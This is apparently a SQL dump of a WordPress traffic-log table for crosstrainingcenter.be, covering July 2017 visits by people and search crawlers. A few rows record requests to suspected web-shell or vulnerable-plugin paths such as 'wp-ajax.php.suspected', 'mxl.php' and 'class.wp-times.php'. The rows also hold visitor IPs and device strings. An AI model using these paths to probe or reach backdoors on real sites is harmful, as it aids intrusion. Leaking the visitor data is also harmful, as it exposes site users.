(77540, 1500188160.763618, 1374958463, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77541, 1500188162.605868, 1374958463, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77542, 1500188176.427952, 1374958463, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77543, 1500188187.102274, 1374958463, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77544, 1500188987.518088, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77545, 1500189349.695239, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77546, 1500189350.761988, 2760155429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77547, 1500190951.248330, 624870556, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOgA8bim3x16uqn77GS-Qvo5fhbrfdbh1bJWdLQxByR5VAEtC851lsvF6DNFGqtY-CQQNDB7B9Z-BtYW5aMCS71hHzU-WhCkA0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77548, 1500190969.389068, 624870556, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77549, 1500190990.206594, 624870556, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77550, 1500190998.348049, 624870556, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77551, 1500191758.435915, 1055643623, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77552, 1500191759.478126, 1055643623, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77553, 1500194494.776047, 976357689, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'BaiduSpider'),
(77554, 1500194498.575658, 976357689, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'BaiduSpider'),
(77555, 1500198487.989159, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/uploadify/readme.txt', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(77556, 1500200423.205407, 1463849781, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77557, 1500200424.789493, 1463849781, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77558, 1500200434.651467, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77559, 1500200451.636014, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77560, 1500200549.497893, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77561, 1500200562.884398, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77562, 1500200567.328329, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77563, 1500200593.898228, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77564, 1500200610.473450, 1463849781, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77565, 1500200661.070949, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77566, 1500200749.421513, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77567, 1500201049.712991, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko)'),
(77568, 1500201153.540757, 1463849781, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(77569, 1500203704.536110, 621928491, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(77570, 1500206656.394145, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77571, 1500206656.887201, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77572, 1500209324.172168, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(77573, 1500216339.430196, 1540278299, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/avada/content-wrapper.php', 'http://crosstrainingcenter.be/wp-content/themes/avada/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(77574, 1500226899.623492, 976357689, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'BaiduSpider'),
(77575, 1500226905.374435, 976357689, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'BaiduSpider'),
(77576, 1500226998.886835, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77577, 1500230671.193000, 1123631236, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77578, 1500246870.308623, 3582305802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Jooblebot/2.0; +http://jooble.org/jooble-bot)'),
(77579, 1500253912.533825, 3475901822, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77580, 1500257189.264427, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/css.php', 'http://www.crosstrainingcenter.be/css.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(77581, 1500259034.062030, 872366381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77582, 1500270352.986590, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77583, 1500279656.303223, 1806327814, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '213.186.33.3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(77584, 1500281425.523683, 3475901729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77585, 1500298956.563581, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77586, 1500298957.157872, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77587, 1500298957.721229, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77588, 1500298958.157062, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77589, 1500298958.618252, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77590, 1500298959.127672, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77591, 1500298959.654539, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77592, 1500298960.162969, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77593, 1500298960.694628, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77594, 1500298961.195598, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77595, 1500298962.067961, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77596, 1500301166.490952, 1532393936, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77597, 1500304824.922101, 786801766, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(77598, 1500314037.619287, 2637637520, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77599, 1500316609.388204, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77600, 1500316611.834036, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77601, 1500316612.607385, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77602, 1500316613.150538, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77603, 1500316614.076326, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77604, 1500316614.771194, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77605, 1500316615.590826, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77606, 1500316616.045293, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77607, 1500316616.589043, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77608, 1500316617.114277, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77609, 1500316617.592081, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77610, 1500319551.548723, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77611, 1500319552.602531, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77612, 1500319553.271196, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77613, 1500319553.745256, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77614, 1500319554.195066, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77615, 1500319554.704052, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77616, 1500319555.662263, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77617, 1500319556.771785, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77618, 1500319557.778544, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77619, 1500319558.463681, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77620, 1500319558.920639, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77621, 1500327072.649286, 1123631236, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77622, 1500339345.667110, 872366417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77623, 1500352103.863036, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/mxl.php', 'http://www.crosstrainingcenter.be/mxl.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(77624, 1500354442.039983, 2760155399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77625, 1500357166.035095, 3024883471, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77626, 1500357849.088121, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77627, 1500360081.301580, 1538358128, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77628, 1500360084.055913, 1538358128, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77629, 1500360093.407039, 1538358128, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77630, 1500360120.735504, 1538358128, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77631, 1500360131.451973, 1538358128, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77632, 1500362383.893561, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77633, 1500362384.258345, 872368002, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77634, 1500363349.535608, 1538358128, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77635, 1500363349.537554, 1538358128, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77636, 1500373768.816117, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77637, 1500383675.541775, 3103966404, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(77638, 1500383676.260738, 3256705680, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(77639, 1500383678.733621, 3256705680, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(77640, 1500388434.731742, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77641, 1500388435.303419, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77642, 1500392704.606612, 1052827874, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/class.wp-times.php', 'http://crosstrainingcenter.be/wp-includes/class.wp-times.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77643, 1500393023.145466, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77644, 1500398049.355339, 872366347, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77645, 1500400781.674651, 1427857479, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1; LENNY2 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36'),
(77646, 1500400793.588862, 1427857479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; LENNY2 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36'),
(77647, 1500400888.492317, 1427857479, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; LENNY2 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36'),
(77648, 1500402057.873859, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77649, 1500402059.648573, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77650, 1500402060.936797, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
